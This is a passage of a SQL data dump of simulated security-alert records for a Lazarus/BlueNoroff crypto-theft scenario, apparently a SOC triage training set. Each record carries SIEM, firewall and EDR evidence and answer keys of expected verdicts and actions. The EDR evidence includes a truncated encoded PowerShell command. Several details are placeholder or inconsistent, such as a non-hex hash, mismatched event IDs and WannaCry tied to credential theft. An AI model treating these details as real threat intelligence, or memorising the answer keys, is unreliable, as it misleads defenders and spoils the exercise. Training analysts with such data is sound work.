-silent\\\",\\\"malware_family\\\":\\\"AppleJeus\\\",\\\"severity\\\":\\\"High\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.863Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:31Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.23\\\",\\\"username\\\":\\\"jdoe\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Users\\\\\\\\jdoe\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\CryptoTrader.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"event_description\\\":\\\"Process execution detected\\\",\\\"command_line\\\":\\\"\\\\\\\"C:\\\\\\\\Users\\\\\\\\jdoe\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\CryptoTrader.exe\\\\\\\" 
-silent\\\",\\\"malware_family\\\":\\\"AppleJeus\\\",\\\"severity\\\":\\\"High\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.863Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:31Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.23\\\",\\\"username\\\":\\\"jdoe\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Users\\\\\\\\jdoe\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\CryptoTrader.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"event_description\\\":\\\"Process execution detected\\\",\\\"command_line\\\":\\\"\\\\\\\"C:\\\\\\\\Users\\\\\\\\jdoe\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\CryptoTrader.exe\\\\\\\" -silent\\\",\\\"malware_family\\\":\\\"AppleJeus\\\",\\\"severity\\\":\\\"High\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.863Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:31Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.23\\\",\\\"username\\\":\\\"jdoe\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Users\\\\\\\\jdoe\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\CryptoTrader.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"event_description\\\":\\\"Process execution detected\\\",\\\"command_line\\\":\\\"\\\\\\\"C:\\\\\\\\Users\\\\\\\\jdoe\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\CryptoTrader.exe\\\\\\\" -silent\\\",\\\"malware_family\\\":\\\"AppleJeus\\\",\\\"severity\\\":\\\"High\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.863Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:31Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.23\\\",\\\"username\\\":\\\"jdoe\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Users\\\\\\\\jdoe\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\CryptoTrader.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"event_description\\\":\\\"Process execution detected\\\",\\\"command_line\\\":\\\"\\\\\\\"C:\\\\\\\\Users\\\\\\\\jdoe\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\CryptoTrader.exe\\\\\\\" -silent\\\",\\\"malware_family\\\":\\\"AppleJeus\\\",\\\"severity\\\":\\\"High\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1358, 'Establishing Persistence Mechanism', 'high', 'System Registry Logs', 'Using AppleJeus, BlueNoroff modifies system startup configurations in the registry to maintain persistent access even after system reboots.', 'Persistence', 'T1547.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:22:03Z\",\"registry_path\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\",\"action\":\"modify\",\"username\":\"compromised_user\",\"filename\":\"applejeus.exe\",\"file_hash\":\"9f2b3c8d4a5e6f7g8h9i0j1k2l3m4n5o6p7q8r9s\",\"internal_ip\":\"192.168.1.100\",\"external_ip\":\"203.0.113.45\",\"malware_name\":\"AppleJeus\",\"attacker_group\":\"BlueNoroff\"}', '2026-03-01 23:02:16', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intelligence\",\"verdict\":\"malicious\",\"details\":\"Known IP used by BlueNoroff group.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"9f2b3c8d4a5e6f7g8h9i0j1k2l3m4n5o6p7q8r9s\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_analysis\",\"verdict\":\"malicious\",\"details\":\"Malware hash associated with AppleJeus.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"applejeus.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"Executable used by AppleJeus malware.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_logs\",\"verdict\":\"suspicious\",\"details\":\"User account exhibiting unusual 
activity.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'intermediate', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.866Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:03Z\\\",\\\"registry_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"action\\\":\\\"modify\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"filename\\\":\\\"applejeus.exe\\\",\\\"file_hash\\\":\\\"9f2b3c8d4a5e6f7g8h9i0j1k2l3m4n5o6p7q8r9s\\\",\\\"internal_ip\\\":\\\"192.168.1.100\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"malware_name\\\":\\\"AppleJeus\\\",\\\"attacker_group\\\":\\\"BlueNoroff\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.866Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:03Z\\\",\\\"registry_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"action\\\":\\\"modify\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"filename\\\":\\\"applejeus.exe\\\",\\\"file_hash\\\":\\\"9f2b3c8d4a5e6f7g8h9i0j1k2l3m4n5o6p7q8r9s\\\",\\\"internal_ip\\\":\\\"192.168.1.100\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"malware_name\\\":\\\"AppleJeus\\\",\\\"attacker_group\\\":\\\"BlueNoroff\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.866Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:03Z\\\",\\\"registry_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"action\\\":\\\"modify\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"filename\\\":\\\"applejeus.exe\\\",\\\"file_hash\\\":\\\"9f2b3c8d4a5e6f7g8h9i0j1k2l3m4n5o6p7q8r9s\\\",\\\"internal_ip\\\":\\\"192.168.1.100\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"malware_name\\\":\\\"AppleJeus\\\",\\\"attacker_group\\\":\\\"BlueNoroff\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.866Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:03Z\\\",\\\"registry_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"action\\\":\\\"modify\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"filename\\\":\\\"applejeus.exe\\\",\\\"file_hash\\\":\\\"9f2b3c8d4a5e6f7g8h9i0j1k2l3m4n5o6p7q8r9s\\\",\\\"internal_ip\\\":\\\"192.168.1.100\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"malware_name\\\":\\\"AppleJeus\\\",\\\"attacker_group\\\":\\\"BlueNoroff\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.866Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:03Z\\\",\\\"registry_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"action\\\":\\\"modify\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"filename\\\":\\\"applejeus.exe\\\",\\\"file_hash\\\":\\\"9f2b3c8d4a5e6f7g8h9i0j1k2l3m4n5o6p7q8r9s\\\",\\\"internal_ip\\\":\\\"192.168.1.100\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"malware_name\\\":\\\"AppleJeus\\\",\\\"attacker_group\\\":\\\"BlueNoroff\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1359, 'Lateral Movement Detected', 'high', 'Internal Network Traffic Analysis', 'The attackers leverage stolen credentials to move laterally across the network, seeking to compromise additional hosts and expand their control. Anomalous internal traffic patterns and unauthorized access attempts have been detected.', 'Lateral Movement', 'T1078 - Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"event_id\":\"4624\",\"source_ip\":\"192.168.1.105\",\"destination_ip\":\"10.0.0.23\",\"username\":\"jdoe\",\"event_type\":\"logon\",\"authentication_package\":\"NTLM\",\"logon_type\":\"3\",\"process_name\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"file_hash\":\"3e7a3f4fbe5e4a1b9f9b6d8f4b1d5e9c\",\"external_ip\":\"203.0.113.45\",\"details\":\"Suspicious lateral movement detected with compromised credentials using NTLM authentication.\"}', '2026-03-01 23:02:16', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal database\",\"verdict\":\"internal\",\"details\":\"Known internal IP associated with the compromised user account.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal database\",\"verdict\":\"internal\",\"details\":\"Internal server targeted for compromise.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal database\",\"verdict\":\"suspicious\",\"details\":\"User credentials were used in an unauthorized manner.\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"threat intelligence\",\"verdict\":\"malicious\",\"details\":\"IP associated with known threat actor 
infrastructure.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"3e7a3f4fbe5e4a1b9f9b6d8f4b1d5e9c\",\"is_critical\":true,\"osint_result\":{\"source\":\"file reputation service\",\"verdict\":\"malicious\",\"details\":\"Hash matches a known malware sample used for lateral movement.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'intermediate', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1360, 'Data Exfiltration in Progress', 'high', 'Outbound Network Traffic Monitoring', 'In the final stage of their operation, BlueNoroff initiates the exfiltration of sensitive cryptocurrency-related data, aiming to transmit it to their external command and control servers.', 'Exfiltration', 'T1041: Exfiltration Over C2 Channel', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:32:45Z\",\"src_ip\":\"10.0.2.15\",\"dest_ip\":\"203.0.113.45\",\"protocol\":\"HTTPS\",\"src_port\":\"44321\",\"dest_port\":\"443\",\"username\":\"jdoe\",\"exfiltrated_file\":\"crypto_wallets.dat\",\"file_hash\":\"2c1743a391305fbf367df8e4f069f9f9f6a1c3f4\",\"malware_family\":\"BlueNoroff\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\"}', '2026-03-01 23:02:16', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.2.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"malicious\",\"details\":\"Known command and control server used by BlueNoroff.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"crypto_wallets.dat\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"File containing sensitive cryptocurrency data.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"2c1743a391305fbf367df8e4f069f9f9f6a1c3f4\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash linked to BlueNoroff malware activity.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1361, 'Initial Access via Trojanized Trading App', 'high', 'Endpoint Detection and Response (EDR)', 'A cryptocurrency trading application, \'TradePlusPro\', has been identified as being trojanized with malware attributed to the Lazarus Group. Affected systems are at risk of further exploitation. The application was downloaded from an unofficial source, leading to the initial compromise.', 'Malware Installation', 'T1203 Exploitation for Client Execution', 1, 'Closed', 178, '{\"timestamp\":\"2023-10-12T10:32:45Z\",\"event_id\":\"4625\",\"system\":{\"os\":\"Windows 10\",\"hostname\":\"DESKTOP-9LJK23A\",\"internal_ip\":\"192.168.1.45\"},\"user\":{\"username\":\"jdoe\",\"user_id\":\"S-1-5-21-3141592653-589793238-462643383-1001\"},\"file\":{\"name\":\"TradePlusPro_Setup.exe\",\"path\":\"C:\\\\Users\\\\jdoe\\\\Downloads\\\\TradePlusPro_Setup.exe\",\"hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\"},\"network\":{\"remote_ip\":\"203.0.113.45\",\"port\":\"443\",\"protocol\":\"HTTPS\"},\"malware\":{\"name\":\"Lazarus_Trojan\",\"description\":\"Trojanized trading application used to gain initial access to cryptocurrency traders\' systems.\"}}', '2026-03-01 23:02:30', '2026-03-03 08:42:53', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with Lazarus Group operations.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":true,\"osint_result\":{\"source\":\"Vendor AV\",\"verdict\":\"malicious\",\"details\":\"Hash of known malicious installer associated with trojanized software.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"TradePlusPro_Setup.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Filename matches pattern of trojanized software used by 
APTs.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1362, 'Execution of Remote Access Trojan (RAT)', 'critical', 'Network Traffic Analysis', 'Once installed, the trojan activates a Remote Access Trojan (RAT), allowing Lazarus operatives to execute commands and maintain persistence on compromised machines. The RAT communicates with a known malicious IP associated with Lazarus Group activity.', 'Malware Execution', 'T1219 - Remote Access Tools', 1, 'Closed', 178, '{\"timestamp\":\"2023-10-15T14:32:00Z\",\"source_ip\":\"192.168.1.25\",\"destination_ip\":\"185.100.87.202\",\"protocol\":\"HTTP\",\"uri\":\"/command/control\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"malware_hash\":\"b9f7b3e3f5ab4a3a8f1a2f4e2a7b9d8c\",\"username\":\"jdoe\",\"filename\":\"rat_executable.exe\",\"action\":\"C2 Communication\"}', '2026-03-01 23:02:30', '2026-03-03 08:44:54', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of infected host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"185.100.87.202\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with Lazarus Group.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b9f7b3e3f5ab4a3a8f1a2f4e2a7b9d8c\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches a known Lazarus Group RAT.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"clean\",\"details\":\"Legitimate user account.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"rat_executable.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Security\",\"verdict\":\"malicious\",\"details\":\"Filename associated with RAT 
deployment.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1363, 'Persistence through Credential Theft', 'high', 'SIEM Logs', 'An advanced persistent threat actor, identified as part of the Lazarus Group, has been observed harvesting credentials from an infected device to secure a foothold for lateral movement within the organization\'s digital environment. This tactic is indicative of their strategy to maintain long-term access and prepare for financial theft or destructive operations.', 'Credential Access', 'T1110: Brute Force', 1, 'Closed', 178, '{\"timestamp\":\"2023-10-11T14:32:00Z\",\"event_type\":\"authentication_failure\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.105\",\"username\":\"jdoe\",\"failed_attempts\":5,\"method\":\"dictionary_attack\",\"associated_malware\":{\"name\":\"WannaCry\",\"hash\":\"f7a2edb1b4567e2d5f8e8497c9a3f378\",\"filename\":\"wannacry.exe\"},\"indicator_of_compromise\":[\"source_ip\",\"associated_malware\"]}', '2026-03-01 23:02:30', '2026-03-03 08:46:47', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known IP address used by Lazarus Group for credential theft operations.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised device.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"clean\",\"details\":\"Legitimate user account targeted in the attack.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"f7a2edb1b4567e2d5f8e8497c9a3f378\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with WannaCry 
ransomware.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"wannacry.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Executable name used by WannaCry ransomware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.873Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-11T14:32:00Z\\\",\\\"event_type\\\":\\\"authentication_failure\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.105\\\",\\\"username\\\":\\\"jdoe\\\",\\\"failed_attempts\\\":5,\\\"method\\\":\\\"dictionary_attack\\\",\\\"associated_malware\\\":{\\\"name\\\":\\\"WannaCry\\\",\\\"hash\\\":\\\"f7a2edb1b4567e2d5f8e8497c9a3f378\\\",\\\"filename\\\":\\\"wannacry.exe\\\"},\\\"indicator_of_compromise\\\":[\\\"source_ip\\\",\\\"associated_malware\\\"]}\"},{\"timestamp\":\"2026-03-02T13:54:06.873Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-11T14:32:00Z\\\",\\\"event_type\\\":\\\"authentication_failure\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.105\\\",\\\"username\\\":\\\"jdoe\\\",\\\"failed_attempts\\\":5,\\\"method\\\":\\\"dictionary_attack\\\",\\\"associated_malware\\\":{\\\"name\\\":\\\"WannaCry\\\",\\\"hash\\\":\\\"f7a2edb1b4567e2d5f8e8497c9a3f378\\\",\\\"filename\\\":\\\"wannacry.exe\\\"},\\\"indicator_of_compromise\\\":[\\\"source_ip\\\",\\\"associated_malware\\\"]}\"},{\"timestamp\":\"2026-03-02T13:53:06.873Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-11T14:32:00Z\\\",\\\"event_type\\\":\\\"authentication_failure\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.105\\\",\\\"username\\\":\\\"jdoe\\\",\\\"failed_attempts\\\":5,\\\"method\\\":\\\"dictionary_attack\\\",\\\"associated_malware\\\":{\\\"name\\\":\\\"WannaCry\\\",\\\"hash\\\":\\\"f7a2edb1b4567e2d5f8e8497c9a3f378\\\",\\\"filename\\\":\\\"wannacry.exe\\\"},\\\"indicator_of_compromise\\\":[\\\"source_ip\\\",\\\"associated_malware\\\"]}\"},{\"timestamp\":\"2026-03-02T13:52:06.873Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
